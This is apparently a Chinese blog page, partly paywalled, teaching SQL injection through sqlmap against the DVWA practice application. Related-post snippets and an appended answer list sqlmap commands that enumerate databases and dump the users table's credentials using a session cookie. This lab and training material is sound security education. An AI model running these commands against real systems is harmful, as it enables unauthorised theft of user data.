Sql注入之sqlmap+dvwa实例演练

最新推荐文章于 2025-05-14 00:58:10 发布
原创 最新推荐文章于 2025-05-14 00:58:10 发布 · 993 阅读 · 5 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#数据库 #php

本文通过sqlmap和dvwa的实战演练,深入理解SQL注入的原理和利用方式。介绍了sqlmap的安装、dvwa的部署,并讲解了SQL注入的五种类型,以及如何在dvwa中进行注入点扫描和利用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Sql注入之sqlmap+dvwa实例演练

 

相信很多同学都已经知道了什么是sql注入,也明白为什么会发生sql注入。也可以通过在输入框和url中“手工”注入,来实现绕过登录、非法修改这样有趣又实用的功能。但这些还远不能让我们感觉到sql注入的巨大威力。

你也一定听过各种各样的新闻报道xxx网站被黑,上百万用户数据泄露。想知道它们是如何获得这些数据的吗?不讲过多原理,就和实验楼【Sql注入之sqlmap+dvwa实例演练】项目教程一起来实操“拖库”。

sqlmap是当前最火热的自动化SQL注入工具,可以扫描、发现并利用给定URL的SQL注入漏洞。而DVWA是一套包含了一些常见安全漏洞的靶机web应用。矛和盾都在手,一起通过该项目的实际演练来感受sql注入的实际威力吧。

一、sql注入原理

注入式攻击可行的根本原因在于数据与程序/指令的混合。在sql注入中,精心构造的输入数据将“溢出”原本它的数据域范围,成为sql语句控制域的一部分,进而改变和控制sql语句的行为。

利用sql注入漏洞的步骤可分为:

  • 找注入点(在哪里注入)
  • 构造注入内容(如何注入)

注入点:

根据注入的原理,可判断出有与服务器数据交互的地方都有可被注入的可能。Web应用的用户输入方式比较多,其中一些用户输入方式是很明显的,如HTML表单。但还有许多不明显的交互方式例如隐藏的HTML表单输入、HTTP头部、cookies、甚至异步的AJAX数据交互请求。常见的注入点有GET请求(url参数)和POST请求(表单数据)。我们可以通过burp suite这类代理、抓包工具来全面分析可注入点。

注入类型:

最低0.47元/天 解锁文章

200万优质内容无限畅学
SQLMapSQLMap DVWA实战
Black coder
10-26 736
SQLMap 注入 DVWA实战
Web安全Day1 - SQL注入实战攻防
hongrisec的博客
02-20 3346
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担! 本专题文章导航 1.Web安全Day1 - SQL注入实战攻防 https://mp.weixin.qq.com/s/zP0MZNhnZG_S9aoHDXzvWA 1. SQL注入 1.1 漏洞简介 结构化查询语言(Structured Query Language...
DVWA练习——sql注入
haoaaao的博客
01-30 2701
一、sql injection (1)由于dvwa需要登录,因此直接无法获取数据库的内容,则需要在sql注入语句中添加网站的cookie以绕过登录 获取cookie: (2)sqlmap获取数据库: python sqlmap.py -u "http://127.0.0.1:8082/vulnerabilities/sqli/?id=4354&Submit=Submit" --cookie="PHPSESSID=plhm5hfit589nq6h01tiq4u3f3; securit..
SQL注入漏洞的手动注入+sqlmap自动化注入dvwa-Low
2301_81984903的博客
05-14 1683
本文详细介绍了MySQL数据库的基本操作和SQL注入测试方法。首先,通过命令行登录MySQL数据库,展示了如何查询数据库、数据表及表中的数据。接着,文章深入探讨了SQL注入技术,包括数字型和字符型注入的区分方法,以及如何使用order by和and语句进行注入测试。此外,文章还介绍了使用sqlmap工具进行自动化SQL注入测试的步骤,包括探测注入点、获取数据库信息、表名、列名及数据等。通过这些操作,可以有效地识别和利用SQL注入漏洞,获取数据库中的敏感信息。
DVWA通过攻略之SQL注入_dvwa sql注入
2401_84968371的博客
05-12 1958
此方法是在页面没有显示位,但是echo mysql_error();函数输出了错误信息的时候方能使用。优点是注入速度快,缺点是语句较为复杂,而且只能用limit依次进行猜解。总体来说,报错注入其实是一种公式化的注入方法,主要用于在页面中没有显示位,但是用echo mysql_error();输出了错误信息时使用。注入过程:第一步:SQL注入点探测。探测SQL注入点是关键的一步,通过适当的分析应用程序,可以判断什么地方存在SQL注入点。
sqlmap命令学习及测试dvwa_SQL_Injection】
qq_58553228的博客
06-26 720
内容有常见的sqlmap的options,至于script暂未学习到。
sqlmap的常用命令和对dvwa的初,中级sql注入测试
G17653692793的博客
05-03 2330
sqlmap -u "[目标注入点]" --data "[request]" --cookie="[站点cookie]" -D dvwa -Tusers -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users -C user,password --dump。sqlmap -u "[目标注入点]" --cookie="[站点cookie]" -D dvwa -T users --dump。
简单的SQL注入 -- dvwa
kylinholmes的博客
03-22 579
简单的SQL注入dvwadvwa的 low-level为例 文章目录简单的SQL注入 -- dvwa布尔注入Injection CodeResult联合注入1.确定字段数Injection CodeResult (错误信息)Result (正确信息)2. 找到数据库名称Injection CodeResult3. 找到数据库内的表名Injection CodeResult Code4. 找到表的字段Injection CodeResult5. 找到敏感信息Injection CodeResu
e-1-6-通过sqlnamp检测sql注入漏洞-随堂笔记 .doc
10-23
SQL注入漏洞与SQLmap工具】 SQL注入是一种常见的网络安全漏洞,攻击者通过在Web表单中插入恶意SQL语句,欺骗服务器执行非预期的数据库操作。这种漏洞可能导致数据泄露、非法权限获取,甚至整个数据库系统的瘫痪。...
桂林电子科技大学网络渗透测试实验:XSS与SQL注入
"桂林电子科技大学2021-2022学年第1学期网络渗透测试实验报告,涉及XSS和SQL注入攻击的理论与实践,使用Beef、AWVS、SqlMAPDVWA等工具进行实验。实验环境包括KaliLinux2、WindowsServer,网络环境为交换网络结构。...
Kali安全测试 Web白帽子高级工程师-高级课程:sql注入攻击机理及实验环境搭建
# 1. 简介 ## A. Web安全测试概述 在当今互联网时代,Web安全测试显得尤...SQL注入攻击是Web应用程序中最为常见的安全漏洞之一。 ## C. 实验环境搭建的重要性 搭建实验环境是学习SQL注入攻击的重要步骤。通过实践操作
sqlmap在windows上执行sql注入,利用dvwa靶场.md
05-19
分享一下自己学习sqlmap的过程,因为网上的资源很少,所以就想着写个博客记录一下,同时也分享一下吧。就先讲到这里吧,有问题的可以私信。欢迎大家提意见。
DVWA-SQL盲注脚本(全)
10-04
DVWA SQL盲注,Low,Medium,High 三个级别的bool盲注脚本,比较完整,配套解释 : https://blog.youkuaiyun.com/csdn_Pade/article/details/82886765
DVWA 黑客攻防演练(一) 介绍及安装
weixin_30954607的博客
12-24 718
原本是像写一篇 SELinux 的文章的。而我写总结文章的时候,总会去想原因是什么,为什么会有这种需求。而我发觉 SELinux 的需求是编程人员的神奇代码或者维护者的脑袋短路而造成系统容易被攻击。就想找个充满漏洞的系统来证明 SELinux 的必要性。就找到了 DVWA 。因为它存在很多方面的漏洞,而且还有不同级别的攻击方式,觉得还挺好玩的。。。所以就不如开发一遍新大陆,把攻防两端的手段也记录一...
Sqlmap 注入DVWA[low]
R4bbit
04-11 1159
0.dvwa要登陆才能访问到带有sql注入的页面,所以我们需要带有cookie注入 参数:--cookie="you cookie" 伪命令: sqlmap -u "http://www.sxxxx.com/1.php?id=111" --cookie="You cookie" 使用演示: 因为命令太长了,不方便看,我将参数以行间隔,真正使用的时候是不需要用行间隔的 sqlmap --url...
DVWA(三)——SQL注入
per_se_veran_ce的博客
08-23 311
讲恶意的SQL语句注入到合法的语句中 类型 1、
DVWA平台搭建+SQL注入实验详解
二狗的博客
04-04 7888
实现DVWA平台的搭建,为后续的SQL注入提供练习环境;进行SQL注入的练习,目的是了解因web应用程序对用户输入数据的合法性没有判断或过滤不严,而造成的危害,以便后续更好地掌握对其的防御手段,提高网络安全意识;
SQL实战post注入DVWA
weixin_44689834的博客
05-20 773
1.首先搭建好自己本地的DVWA,进入DVWA并登录,将安全级别调至low 2.使用burpsuite打开拦截,浏览器设置本地代理进行抓包,在sql injection页面userID输入并enter 3.没有发现数据包emmm 4.百度了一哈发现需要把localhost改为自己本地IP地址 5.改了之后重新进入DVWA将安全等级设为low,进入SQL injection页面输入1回车 6.返回burpsuite查看是否抓到了 抓取数据包成功 7.将抓取到的数据包复制为TXT文件 我命名为1.txt
DVWASQL注入(盲注)
天空之蓝的博客
11-17 4656
SQL Injection(Blind),即SQL盲注,与一般注入的区别在于,一般的注入攻击者可以直接从页面上看到注入语句的执行结果,而盲注时攻击者通常是无法从显示页面上获取执行结果,甚至连注入语句是否执行都无从得知,因此盲注的难度要比一般注入高。目前网络上现存的SQL注入漏洞大多是SQL盲注。手工盲注的过程,就像你与一个机器人聊天,这个机器人知道的很多,但只会回答“是”或者“不是”,因此你需要询问它这样的问题,例如“数据库名字的第一个字母是不是a啊?”,通过这种机械的询问,最终获得你想要的数据。
sqlmapdvwa低级sql注入
最新发布
06-21
### 使用sqlmapDVWA低级SQL注入进行渗透测试 在使用sqlmapDVWA的低级SQL注入(Low Level SQL Injection)进行渗透测试时,需要确保正确配置目标URL和相关的Cookies。以下是详细的说明与操作步骤: #### 1. 确定目标URL DVWASQL注入漏洞页面通常位于`/vulnerabilities/sqli/`路径下,目标URL格式如下: ```plaintext http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit# ``` 其中,`<DVWA-IP>`为DVWA服务器的IP地址。 #### 2. 设置Cookies 为了绕过DVWA的安全级别限制(如`security=low`),需要提供正确的PHPSESSID和安全级别参数。例如: ```plaintext PHPSESSID=v1d47lav6lot63v45vif84lren; security=low ``` #### 3. 基本命令结构 使用以下基本命令启动sqlmap工具: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" ``` 此命令中: - `-u`指定目标URL。 - `--cookie`传递必要的会话信息[^1]。 #### 4. 获取数据库信息 可以通过附加参数来获取更多数据库相关信息: - **获取当前数据库名称**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --current-db --batch ``` 此命令将返回当前使用的数据库名称,例如`dvwa`[^3]。 - **枚举所有数据库**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --dbs --batch ``` - **枚举特定数据库中的表**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa --tables --batch ``` - **枚举特定表中的列**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa -T users --columns --batch ``` - **转储数据**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" -D dvwa -T users -C user,password --dump --batch ``` #### 5. 注意事项 - **安全性**:仅在授权的环境中进行渗透测试,避免非法操作。 - **错误抑制**:DVWA可能通过代码修改抑制了MySQL错误信息输出[^4],这可能影响sqlmap的检测效率。在这种情况下,可以尝试布尔盲注或时间盲注模式。 - **布尔盲注**: ```bash sqlmap -u "http://<DVWA-IP>/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#" --cookie="PHPSESSID=<SESSION-ID>; security=low" --technique=B --batch ``` ### 示例代码 以下是一个完整的sqlmap命令示例: ```bash sqlmap -u "http://172.16.60.233/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#" --cookie="PHPSESSID=v1d47lav6lot63v45vif84lren; security=low" -D dvwa -T users -C user,password --dump --batch ``` ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值